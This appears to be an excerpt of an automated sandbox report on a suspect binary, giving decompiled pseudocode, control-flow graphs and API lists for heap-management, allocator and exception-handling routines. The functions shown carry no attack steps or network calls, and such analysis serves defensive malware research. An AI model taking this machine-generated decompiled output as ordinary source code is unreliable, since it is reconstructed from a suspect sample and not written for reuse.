                                                                  • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040343F
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.357661056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.357655323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357681696.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357725798.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357738038.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357745235.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_MqE1p1WFrf.jbxd
                                                                  Similarity
                                                                  • API ID: QueryVirtual$DispatcherExceptionInfoSystemUser
                                                                  • String ID:
                                                                  • API String ID: 1090749754-0
                                                                  • Opcode ID: 031759bf0889824944f4ec0072e56a51ea57cacbeb479317f7538994f8d10efb
                                                                  • Instruction ID: 164150b595f4f52f238f0460cdee3619ee914296c8574435b01039ac157ce273
                                                                  • Opcode Fuzzy Hash: 031759bf0889824944f4ec0072e56a51ea57cacbeb479317f7538994f8d10efb
                                                                  • Instruction Fuzzy Hash: 6B417031A00208ABDB21DF95C885E9FBFBCAB44745F14847AE504BA292D378AA45CB19
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00402E8B Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 301memoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 133 402e8b-402ebc 135 403231-403232 133->135 136 402ec2-402ed9 HeapAlloc 133->136 137 40321f-40322c HeapDestroy call 401003 136->137 138 402edf-402f03 HeapAlloc 136->138 137->135 140 4031f7-403201 138->140 141 402f09-402f25 138->141 142 403211-403219 HeapFree 140->142 143 403203-40320c 140->143 144 402f28-402f44 141->144 142->137 143->142 144->144 145 402f46-402f62 144->145 145->145 146 402f64-402f9d call 403233 call 401472 call 4014dd call 403299 145->146 155 403192-403195 call 40327f 146->155 156 402fa3-402fac call 403299 146->156 160 40319a-4031a3 HeapFree 155->160 162 402faf-402fb3 156->162 161 4031a9-4031b5 160->161 161->140 163 4031b7-4031c3 161->163 164 403182-403189 162->164 165 402fb9-402fc0 162->165 166 4031c6-4031e5 163->166 164->155 167 40318b-40318e 164->167 165->164 168 402fc6 165->168 166->166 169 4031e7-4031f5 HeapFree 166->169 167->155 170 402fc9 call 40145c 168->170 169->161 171 402fce-402fd2 call 401b02 170->171 173 402fd7-402fdf 171->173 174 402fe1 173->174 175 402fe3-402ff8 173->175 176 40304e-403055 174->176 177 402ffc-403000 175->177 179 403125-40312c 176->179 180 40305b-40308b 176->180 177->176 178 403002-403011 177->178 185 403013-40301c 178->185 186 40301e 178->186 181 403160 179->181 182 40312e-403135 179->182 183 4030a7-4030b2 180->183 184 40308d-403091 180->184 190 403164-40317d call 4032b7 call 403299 181->190 182->181 187 403137-40313e 182->187 191 403120 183->191 192 4030b4-4030bd 183->192 188 403093 184->188 189 403098-4030a5 call 4014ad 184->189 193 403022-403035 185->193 186->193 187->181 194 403140-403147 187->194 188->191 189->191 190->162 191->176 192->191 197 4030bf-4030e0 192->197 198 403037 193->198 199 403039-403049 call 401c19 193->199 200 403157-40315e 194->200 201 403149-403155 194->201 197->197 204 4030e2-4030f9 197->204 205 40304c 198->205 199->205 200->190 201->181 201->200 204->204 208 4030fb-40310f 204->208 205->177 211 403111-403119 208->211 212 40311a-40311e 208->212 211->212 212->191 212->197
                                                                  C-Code - Quality: 59%
                                                                  			E00402E8B() {
				signed int _v8;
				void* _v12;
				intOrPtr _v16;
				char _v20;
				void* _v24;
				signed int _v28;
				intOrPtr _v32;
				void* _v36;
				signed int _v40;
				intOrPtr _v44;
				void* _v48;
				void* _v52;
				signed int _v56;
				intOrPtr* _v60;
				signed int _v64;
				intOrPtr* _v68;
				signed int _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				signed int _v84;
				void* _t179;
				char* _t182;
				intOrPtr _t183;
				void* _t317;
				void* _t318;

				_v8 = _v8 & 0x00000000;
				_t179 = HeapCreate(0, 0x100000, 0x1000000); // executed
				_v12 = _t179;
				_v16 = 0x42d038;
				_v20 = 0x4255dc;
				if(_v12 == 0) {
					return _t179;
				}
				_v24 = HeapAlloc(_v12, 8, 0xb0);
				if(_v24 == 0) {
					L52:
					HeapDestroy(_v12); // executed
					_t182 =  &_v20;
					_push(_t182);
					L00401003();
					return _t182;
				}
				_v28 = _v28 & 0x00000000;
				_v40 = _v40 & 0x00000000;
				_t183 =  *0x400000; // 0x905a4d
				_v32 = _t183;
				_v36 = HeapAlloc(_v12, 8, 0x40);
				if(_v36 == 0) {
					L49:
					if( *((intOrPtr*)(_v24 + 0xa8)) != 0) {
						 *0x42d030 =  *((intOrPtr*)(_v24 + 0xa8));
					}
					HeapFree(_v12, 0, _v24);
					goto L52;
				} else {
					 *(_v24 + 0xa0) =  *(_v24 + 0xa0) & 0x00000000;
					 *((intOrPtr*)(_v24 + 0xa4)) = _v12;
					 *((intOrPtr*)(_v24 + 4)) = _v24;
					do {
						 *((intOrPtr*)(_v24 + 0x50)) = _v24 + 0x50;
						 *((intOrPtr*)(_v24 + 0x54)) = _v24 + 0x50;
					} while (0 != 0);
					do {
						 *((intOrPtr*)(_v24 + 0x58)) = _v24 + 0x58;
						 *((intOrPtr*)(_v24 + 0x5c)) = _v24 + 0x58;
					} while (0 != 0);
					E00403233(_v36);
					E00401472(_v36, _v24);
					E004014DD(_v24, E00403317, 0x64, 0, 0, 0);
					_t318 = _t317 + 0x18;
					if(E00403299(_v36) == 0) {
						L44:
						E0040327F(_v36);
						HeapFree(_v12, 0, _v36);
						while(_v24 + 0x50 !=  *((intOrPtr*)(_v24 + 0x50))) {
							_v52 =  *((intOrPtr*)(_v24 + 0x54));
							_v48 = _v52;
							do {
								 *((intOrPtr*)( *((intOrPtr*)(_v52 + 4)))) =  *_v52;
								 *((intOrPtr*)( *_v52 + 4)) =  *((intOrPtr*)(_v52 + 4));
							} while (0 != 0);
							HeapFree(_v12, 0, _v48);
						}
						goto L49;
					}
					_v44 = E00403299(_v36);
					while(_v44 != 0 &&  *(_v36 + 0x18) == 0) {
						E0040145C(_v36);
						E00401B02(_v36);
						if( *(_v36 + 0x28) != 0) {
							_v56 =  *((intOrPtr*)( *(_v36 + 0x28) + 0x28));
							_v64 = _v56;
							 *(_v36 + 0x28) =  *(_v36 + 0x28) & 0x00000000;
							while(_v64 != 0) {
								_v60 = _v64;
								if( *((intOrPtr*)(_v60 + 0x28)) == _v56) {
									_v72 = _v72 & 0x00000000;
								} else {
									_v72 =  *((intOrPtr*)(_v60 + 0x28));
								}
								_v64 = _v72;
								_v76 =  *((intOrPtr*)(_v60 + 4));
								if(_v76 == 1) {
									_push(_v60);
									E00401C19(_v36,  *_v60);
									_t318 = _t318 + 0xc;
								}
							}
							L21:
							while( *((intOrPtr*)(_v36 + 0x2c)) != 0) {
								_v68 =  *((intOrPtr*)(_v36 + 0x2c));
								 *((intOrPtr*)(_v36 + 0x2c)) =  *((intOrPtr*)(_v68 + 0x18));
								 *(_v68 + 0x1c) =  *(_v68 + 0x1c) & 0x000000fb;
								_v80 =  *((intOrPtr*)(_v68 + 0xc));
								if(_v80 == 1) {
									if(( *(_v68 + 0x1c) & 0x00000001) == 0 ||  *((char*)(_v68 + 0x50)) != 0) {
										L33:
										continue;
									} else {
										goto L28;
										do {
											do {
												L28:
												 *((intOrPtr*)( *((intOrPtr*)(_v68 + 0x14)))) =  *((intOrPtr*)(_v68 + 0x10));
												 *((intOrPtr*)( *((intOrPtr*)(_v68 + 0x10)) + 4)) =  *((intOrPtr*)(_v68 + 0x14));
											} while (0 != 0);
											do {
												 *((intOrPtr*)( *((intOrPtr*)(_v68 + 8)) + 4)) =  *((intOrPtr*)( *((intOrPtr*)(_v68 + 8)) + 4)) - 1;
											} while (0 != 0);
											 *(_v68 + 0x1c) =  *(_v68 + 0x1c) | 0x00000002;
											if( *_v68 != 0) {
												 *_v68(_v68);
											}
										} while (0 != 0);
										goto L33;
									}
								}
								if(_v80 == 3) {
									_push(_v68);
									E004014AD(_v36);
								}
								goto L33;
							}
							if( *(_v36 + 0x28) != 0 ||  *((intOrPtr*)(_v36 + 0x2c)) != 0 ||  *(_v36 + 0x18) != 0 ||  *((intOrPtr*)(_v36 + 4)) <= 0 && _v36 + 0x10 ==  *((intOrPtr*)(_v36 + 0x10))) {
								_v84 = _v84 & 0x00000000;
							} else {
								_v84 = 1;
							}
							E004032B7(_v36, _v84);
							_v44 = E00403299(_v36);
							continue;
						}
						goto L21;
					}
					if( *(_v36 + 0x18) != 0) {
						 *(_v36 + 0x18) =  *(_v36 + 0x18) & 0x00000000;
					}
					goto L44;
				}
			}




























                                                                  0x00402e91
                                                                  0x00402ea1
                                                                  0x00402ea7
                                                                  0x00402eaa
                                                                  0x00402eb1
                                                                  0x00402ebc
                                                                  0x00403232
                                                                  0x00403232
                                                                  0x00402ed2
                                                                  0x00402ed9
                                                                  0x0040321f
                                                                  0x00403222
                                                                  0x00403228
                                                                  0x0040322b
                                                                  0x0040322c
                                                                  0x00000000
                                                                  0x0040322c
                                                                  0x00402edf
                                                                  0x00402ee3
                                                                  0x00402ee7
                                                                  0x00402eec
                                                                  0x00402efc
                                                                  0x00402f03
                                                                  0x004031f7
                                                                  0x00403201
                                                                  0x0040320c
                                                                  0x0040320c
                                                                  0x00403219
                                                                  0x00000000
                                                                  0x00402f09
                                                                  0x00402f0c
                                                                  0x00402f19
                                                                  0x00402f25
                                                                  0x00402f28
                                                                  0x00402f31
                                                                  0x00402f3d
                                                                  0x00402f42
                                                                  0x00402f46
                                                                  0x00402f4f
                                                                  0x00402f5b
                                                                  0x00402f60
                                                                  0x00402f67
                                                                  0x00402f73
                                                                  0x00402f8a
                                                                  0x00402f8f
                                                                  0x00402f9d
                                                                  0x00403192
                                                                  0x00403195
                                                                  0x004031a3
                                                                  0x004031a9
                                                                  0x004031bd
                                                                  0x004031c3
                                                                  0x004031c6
                                                                  0x004031d1
                                                                  0x004031de
                                                                  0x004031e3
                                                                  0x004031ef
                                                                  0x004031ef
                                                                  0x00000000
                                                                  0x004031a9
                                                                  0x00402fac
                                                                  0x00402faf
                                                                  0x00402fc9
                                                                  0x00402fd2
                                                                  0x00402fdf
                                                                  0x00402fec
                                                                  0x00402ff2
                                                                  0x00402ff8
                                                                  0x00402ffc
                                                                  0x00403005
                                                                  0x00403011
                                                                  0x0040301e
                                                                  0x00403013
                                                                  0x00403019
                                                                  0x00403019
                                                                  0x00403025
                                                                  0x0040302e
                                                                  0x00403035
                                                                  0x00403039
                                                                  0x00403044
                                                                  0x00403049
                                                                  0x00403049
                                                                  0x0040304c
                                                                  0x00000000
                                                                  0x0040304e
                                                                  0x00403061
                                                                  0x0040306d
                                                                  0x0040307b
                                                                  0x00403084
                                                                  0x0040308b
                                                                  0x004030b2
                                                                  0x00403120
                                                                  0x00000000
                                                                  0x004030bf
                                                                  0x00000000
                                                                  0x004030bf
                                                                  0x004030bf
                                                                  0x004030bf
                                                                  0x004030cb
                                                                  0x004030d9
                                                                  0x004030de
                                                                  0x004030e2
                                                                  0x004030f2
                                                                  0x004030f7
                                                                  0x00403106
                                                                  0x0040310f
                                                                  0x00403117
                                                                  0x00403119
                                                                  0x0040311c
                                                                  0x00000000
                                                                  0x004030bf
                                                                  0x004030b2
                                                                  0x00403091
                                                                  0x00403098
                                                                  0x0040309e
                                                                  0x004030a4
                                                                  0x00000000
                                                                  0x00403091
                                                                  0x0040312c
                                                                  0x00403160
                                                                  0x00403157
                                                                  0x00403157
                                                                  0x00403157
                                                                  0x0040316a
                                                                  0x0040317a
                                                                  0x00000000
                                                                  0x0040317a
                                                                  0x00000000
                                                                  0x00402fe1
                                                                  0x00403189
                                                                  0x0040318e
                                                                  0x0040318e
                                                                  0x00000000
                                                                  0x00403189

                                                                  APIs
                                                                  • HeapCreate.KERNEL32(00000000,00100000,01000000,?,?,?,?,?,?,?,?,?,?,?,?,00402E7E), ref: 00402EA1
                                                                  • HeapAlloc.KERNEL32(00000000,00000008,000000B0,?,?,?,?,?,?,?,?,?,?,?,?,00402E7E), ref: 00402ECC
                                                                  • HeapAlloc.KERNEL32(00000000,00000008,00000040), ref: 00402EF6
                                                                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 004031A3
                                                                  • HeapFree.KERNEL32(00000000,00000000,?), ref: 004031EF
                                                                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00403219
                                                                  • HeapDestroy.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00402E7E,00000000), ref: 00403222
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.357661056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.357655323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357681696.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357725798.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357738038.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357745235.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_MqE1p1WFrf.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Free$Alloc$CreateDestroy
                                                                  • String ID: Thv
                                                                  • API String ID: 3769662639-1420341948
                                                                  • Opcode ID: 857fe7b6b985dab9ff3ab7115f696aa1b6c3feba2747989858383e75f5991602
                                                                  • Instruction ID: f20acbc558a01990a2798d599c2cc6400c3bb03c0d3adb31591097a0b95a584c
                                                                  • Opcode Fuzzy Hash: 857fe7b6b985dab9ff3ab7115f696aa1b6c3feba2747989858383e75f5991602
                                                                  • Instruction Fuzzy Hash: 6DD1DE75A00218DFDB15CF98D985BAEBBB1BF08315F20406AE404BB3A1D779AE41CF19
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004059AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30memoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 284 4059ac-4059bc 285 4059c3-4059ca 284->285 286 405a02-405a04 285->286 287 4059cc-4059d9 call 405864 285->287 290 4059e8-4059eb 287->290 291 4059db-4059e6 call 407348 287->291 293 405a05-405a08 290->293 294 4059ed call 407b99 290->294 297 4059f2-4059f4 291->297 294->297 297->293 298 4059f6-4059fc HeapDestroy 297->298 298->286
                                                                  C-Code - Quality: 100%
                                                                  			E004059AC(void* __ecx, intOrPtr _a4) {
				void* _t6;
				intOrPtr _t8;
				void* _t9;
				void* _t10;
				void* _t12;

				_t12 = __ecx;
				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				_t15 = _t6;
				 *0x4303d0 = _t6;
				if(_t6 == 0) {
					L7:
					return 0;
				} else {
					_t8 = E00405864(_t12, _t15);
					 *0x4303d4 = _t8;
					if(_t8 != 3) {
						__eflags = _t8 - 2;
						if(_t8 != 2) {
							goto L8;
						} else {
							_t10 = E00407B99();
							goto L5;
						}
					} else {
						_t10 = E00407348(0x3f8);
						L5:
						if(_t10 != 0) {
							L8:
							_t9 = 1;
							return _t9;
						} else {
							HeapDestroy( *0x4303d0);
							goto L7;
						}
					}
				}
			}








                                                                  0x004059ac
                                                                  0x004059bd
                                                                  0x004059c3
                                                                  0x004059c5
                                                                  0x004059ca
                                                                  0x00405a02
                                                                  0x00405a04
                                                                  0x004059cc
                                                                  0x004059cc
                                                                  0x004059d4
                                                                  0x004059d9
                                                                  0x004059e8
                                                                  0x004059eb
                                                                  0x00000000
                                                                  0x004059ed
                                                                  0x004059ed
                                                                  0x00000000
                                                                  0x004059ed
                                                                  0x004059db
                                                                  0x004059e0
                                                                  0x004059f2
                                                                  0x004059f4
                                                                  0x00405a05
                                                                  0x00405a07
                                                                  0x00405a08
                                                                  0x004059f6
                                                                  0x004059fc
                                                                  0x00000000
                                                                  0x004059fc
                                                                  0x004059f4
                                                                  0x004059d9

                                                                  APIs
                                                                  • HeapCreate.KERNEL32(00000000,00001000,00000000,00404666,00000001), ref: 004059BD
                                                                    • Part of subcall function 00405864: GetVersionExA.KERNEL32 ref: 00405883
                                                                  • HeapDestroy.KERNEL32 ref: 004059FC
                                                                    • Part of subcall function 00407348: HeapAlloc.KERNEL32(00000000,00000140,004059E5,000003F8), ref: 00407355
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.357661056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.357655323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357681696.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357725798.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357738038.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357745235.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_MqE1p1WFrf.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$AllocCreateDestroyVersion
                                                                  • String ID: Thv
                                                                  • API String ID: 2507506473-1420341948
                                                                  • Opcode ID: 8cedb5dbb2d6c26298ab3712bd1fa9cb5e2469477b1dc51b8a24f775daa37fc2
                                                                  • Instruction ID: a2cb5c1f029b0626d0153000ca4b49a7f3520d8031aa3be6c31db1a05df2c35c
                                                                  • Opcode Fuzzy Hash: 8cedb5dbb2d6c26298ab3712bd1fa9cb5e2469477b1dc51b8a24f775daa37fc2
                                                                  • Instruction Fuzzy Hash: AAF06DB0A647019BEF206B719D4676B3694EB44796F10553BF900F81E0EBB894809E0A
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00405073 Relevance: 1.6, APIs: 1, Instructions: 102COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 299 405073-40508f call 404a4d call 4051b1 304 4051a4-4051a7 UnhandledExceptionFilter 299->304 305 405095-40509d 299->305 306 4051ad-4051b0 304->306 305->304 307 4050a3-4050a6 305->307 308 4050b4-4050b7 307->308 309 4050a8-4050af 307->309 310 4050bd-4050cf 308->310 311 40519f-4051a2 308->311 309->306 312 405191-405198 310->312 313 4050d5-4050e6 310->313 311->306 324 405199-40519c 312->324 314 4050e8-4050eb 313->314 315 40510f-405119 313->315 316 4050ee-40510a 314->316 317 405124-405129 315->317 318 40511b-405122 315->318 316->316 320 40510c 316->320 322 405134-405139 317->322 323 40512b-405132 317->323 321 405182-40518f 318->321 320->315 321->324 325 405144-405149 322->325 326 40513b-405142 322->326 323->321 324->311 328 405154-405159 325->328 329 40514b-405152 325->329 326->321 330 405164-405169 328->330 331 40515b-405162 328->331 329->321 332 405174-405179 330->332 333 40516b-405172 330->333 331->321 332->321 334 40517b 332->334 333->321 334->321
                                                                  C-Code - Quality: 50%
                                                                  			E00405073(void* __edi, void* __eflags, signed int _a4, struct _EXCEPTION_POINTERS* _a8) {
				signed int _v8;
				signed int _t36;
				signed int _t37;
				void* _t39;
				signed int _t43;
				intOrPtr _t44;
				intOrPtr _t51;
				intOrPtr _t53;
				signed int _t58;
				signed int _t59;
				intOrPtr _t61;
				signed int _t64;
				void* _t66;

				_t66 = E00404A4D();
				_t36 = E004051B1(_a4,  *((intOrPtr*)(_t66 + 0x50)));
				if(_t36 == 0) {
					L28:
					_t37 = UnhandledExceptionFilter(_a8); // executed
					L29:
					return _t37;
				}
				_t43 =  *(_t36 + 8);
				_a4 = _t43;
				if(_t43 == 0) {
					goto L28;
				}
				if(_t43 != 5) {
					if(_t43 == 1) {
						L27:
						_t37 = _t36 | 0xffffffff;
						goto L29;
					}
					_v8 =  *(_t66 + 0x54);
					 *(_t66 + 0x54) = _a8;
					_t51 =  *((intOrPtr*)(_t36 + 4));
					if(_t51 != 8) {
						 *(_t36 + 8) =  *(_t36 + 8) & 0x00000000;
						 *_t43(_t51);
						L26:
						_t36 = _v8;
						 *(_t66 + 0x54) = _t36;
						goto L27;
					}
					_t59 =  *0x42d510; // 0x3
					_t53 =  *0x42d514; // 0x7
					if(_t59 >= _t53 + _t59) {
						L10:
						_t39 =  *_t36;
						_t61 =  *((intOrPtr*)(_t66 + 0x58));
						if(_t39 != 0xc000008e) {
							if(_t39 != 0xc0000090) {
								if(_t39 != 0xc0000091) {
									if(_t39 != 0xc0000093) {
										if(_t39 != 0xc000008d) {
											if(_t39 != 0xc000008f) {
												if(_t39 == 0xc0000092) {
													 *((intOrPtr*)(_t66 + 0x58)) = 0x8a;
												}
											} else {
												 *((intOrPtr*)(_t66 + 0x58)) = 0x86;
											}
										} else {
											 *((intOrPtr*)(_t66 + 0x58)) = 0x82;
										}
									} else {
										 *((intOrPtr*)(_t66 + 0x58)) = 0x85;
									}
								} else {
									 *((intOrPtr*)(_t66 + 0x58)) = 0x84;
								}
							} else {
								 *((intOrPtr*)(_t66 + 0x58)) = 0x81;
							}
						} else {
							 *((intOrPtr*)(_t66 + 0x58)) = 0x83;
						}
						 *_t43(8,  *((intOrPtr*)(_t66 + 0x58)));
						 *((intOrPtr*)(_t66 + 0x58)) = _t61;
						goto L26;
					} else {
						_t58 = _t59 + _t59 * 2 << 2;
						goto L8;
						L8:
						_t58 = _t58 + 0xc;
						 *(_t58 +  *((intOrPtr*)(_t66 + 0x50)) - 4) =  *(_t58 +  *((intOrPtr*)(_t66 + 0x50)) - 4) & 0x00000000;
						_t64 =  *0x42d510; // 0x3
						_t44 =  *0x42d514; // 0x7
						_t59 = _t59 + 1;
						if(_t59 < _t44 + _t64) {
							goto L8;
						} else {
							_t43 = _a4;
							goto L10;
						}
					}
				} else {
					 *(_t36 + 8) =  *(_t36 + 8) & 0x00000000;
					_t37 = 1;
					goto L29;
				}
			}
















                                                                  0x0040507e
                                                                  0x00405086
                                                                  0x0040508f
                                                                  0x004051a4
                                                                  0x004051a7
                                                                  0x004051ad
                                                                  0x004051b0
                                                                  0x004051b0
                                                                  0x00405095
                                                                  0x0040509a
                                                                  0x0040509d
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004050a6
                                                                  0x004050b7
                                                                  0x0040519f
                                                                  0x0040519f
                                                                  0x00000000
                                                                  0x0040519f
                                                                  0x004050c0
                                                                  0x004050c6
                                                                  0x004050c9
                                                                  0x004050cf
                                                                  0x00405191
                                                                  0x00405196
                                                                  0x00405199
                                                                  0x00405199
                                                                  0x0040519c
                                                                  0x00000000
                                                                  0x0040519c
                                                                  0x004050d5
                                                                  0x004050db
                                                                  0x004050e6
                                                                  0x0040510f
                                                                  0x0040510f
                                                                  0x00405111
                                                                  0x00405119
                                                                  0x00405129
                                                                  0x00405139
                                                                  0x00405149
                                                                  0x00405159
                                                                  0x00405169
                                                                  0x00405179
                                                                  0x0040517b
                                                                  0x0040517b
                                                                  0x0040516b
                                                                  0x0040516b
                                                                  0x0040516b
                                                                  0x0040515b
                                                                  0x0040515b
                                                                  0x0040515b
                                                                  0x0040514b
                                                                  0x0040514b
                                                                  0x0040514b
                                                                  0x0040513b
                                                                  0x0040513b
                                                                  0x0040513b
                                                                  0x0040512b
                                                                  0x0040512b
                                                                  0x0040512b
                                                                  0x0040511b
                                                                  0x0040511b
                                                                  0x0040511b
                                                                  0x00405187
                                                                  0x0040518a
                                                                  0x00000000
                                                                  0x004050e8
                                                                  0x004050eb
                                                                  0x004050eb
                                                                  0x004050ee
                                                                  0x004050f1
                                                                  0x004050f4
                                                                  0x004050f9
                                                                  0x004050ff
                                                                  0x00405105
                                                                  0x0040510a
                                                                  0x00000000
                                                                  0x0040510c
                                                                  0x0040510c
                                                                  0x00000000
                                                                  0x0040510c
                                                                  0x0040510a
                                                                  0x004050a8
                                                                  0x004050a8
                                                                  0x004050ae
                                                                  0x00000000
                                                                  0x004050ae

                                                                  APIs
                                                                    • Part of subcall function 00404A4D: GetLastError.KERNEL32(00000103,7FFFFFFF,0040475E,00403D56,00000000,?,?,00000000,00000001), ref: 00404A4F
                                                                    • Part of subcall function 00404A4D: TlsGetValue.KERNEL32(?,?,00000000,00000001), ref: 00404A5D
                                                                    • Part of subcall function 00404A4D: TlsSetValue.KERNEL32(00000000,?,?,00000000,00000001), ref: 00404A81
                                                                    • Part of subcall function 00404A4D: GetCurrentThreadId.KERNEL32 ref: 00404A92
                                                                    • Part of subcall function 00404A4D: SetLastError.KERNEL32(00000000,?,?,00000000,00000001), ref: 00404AA9
                                                                  • UnhandledExceptionFilter.KERNEL32(?,00000000,?,?,?,00404702,?,?,00000000,00000000), ref: 004051A7
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.357661056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.357655323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357681696.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357725798.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357738038.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.357745235.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_MqE1p1WFrf.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLastValue$CurrentExceptionFilterThreadUnhandled
                                                                  • String ID:
                                                                  • API String ID: 4042998559-0
                                                                  • Opcode ID: 8faad24ad810db38b14f993b742da39d933f3f7f92c019355e0aedf26fe01de9
                                                                  • Instruction ID: 71cf82fe8a869170d8fb4eda2262958b3a3235df2dac30d056e03f724ef1b52e
                                                                  • Opcode Fuzzy Hash: 8faad24ad810db38b14f993b742da39d933f3f7f92c019355e0aedf26fe01de9
                                                                  • Instruction Fuzzy Hash: 9F315E70A04B40AFEB358F54D88072B77A1FB45328F24852FD442AF6D1C7B8E9858F09
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004070B8 Relevance: 1.6, APIs: 1, Instructions: 80memoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 335 4070b8-4070e3 336 4070e5-4070ee 335->336 337 407128-40712b 335->337 338 407187-40718c 336->338 340 4070f4-407118 call 405d91 call 4076e4 call 40711f 336->340 337->338 339 40712d-407132 337->339 344 407191-407196 338->344 345 40718e-407190 338->345 341 407134-40713a 339->341 342 40713c-40713e 339->342 340->338 359 40711a 340->359 347 40713f-407148 341->347 342->347 346 407197-40719f RtlAllocateHeap 344->346 345->344 349 4071a5-4071b3 346->349 350 407178-407179 347->350 351 40714a-407176 call 405d91 call 407e91 call 40717e 347->351 350->346 351->349 351->350 359->349
                                                                  C-Code - Quality: 24%
                                                                  			E004070B8(unsigned int _a4) {
				signed int _v8;
				intOrPtr _v20;
				void* _v32;
				intOrPtr _t19;
				void* _t20;
				signed char _t22;
				void* _t23;
				void* _t24;
				void* _t36;
				unsigned int _t44;
				unsigned int _t46;
				intOrPtr _t47;
				void* _t50;

				_push(0xffffffff);
				_push(0x42bf38);
				_push(E00405B04);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t47;
				_t19 =  *0x4303d4; // 0x1
				if(_t19 != 3) {
					__eflags = _t19 - 2;
					if(_t19 != 2) {
						goto L11;
					} else {
						_t24 = _a4;
						__eflags = _t24;
						if(_t24 == 0) {
							_t44 = 0x10;
						} else {
							_t9 = _t24 + 0xf; // 0xf
							_t44 = _t9 & 0xfffffff0;
						}
						_a4 = _t44;
						__eflags = _t44 -  *0x42f914; // 0x1e0
						if(__eflags > 0) {
							L10:
							_push(_t44);
							goto L14;
						} else {
							E00405D91(9);
							_pop(_t36);
							_v8 = 1;
							_v32 = E00407E91(_t36, _t44 >> 4);
							_v8 = _v8 | 0xffffffff;
							E0040717E();
							_t23 = _v32;
							__eflags = _t23;
							if(_t23 == 0) {
								goto L10;
							}
						}
					}
				} else {
					_t46 = _a4;
					_t50 = _t46 -  *0x4301a8; // 0x0
					if(_t50 > 0) {
						L11:
						_t20 = _a4;
						__eflags = _t20;
						if(_t20 == 0) {
							_t20 = 1;
						}
						_t22 = _t20 + 0x0000000f & 0x000000f0;
						__eflags = _t22;
						_push(_t22);
						L14:
						_push(0);
						_t23 = RtlAllocateHeap( *0x4303d0); // executed
					} else {
						E00405D91(9);
						_v8 = _v8 & 0x00000000;
						_push(_t46);
						_v32 = E004076E4();
						_v8 = _v8 | 0xffffffff;
						E0040711F();
						_t23 = _v32;
						if(_t23 == 0) {
							goto L11;
						} else {
						}
					}
				}
				 *[fs:0x0] = _v20;
				return _t23;
			}
















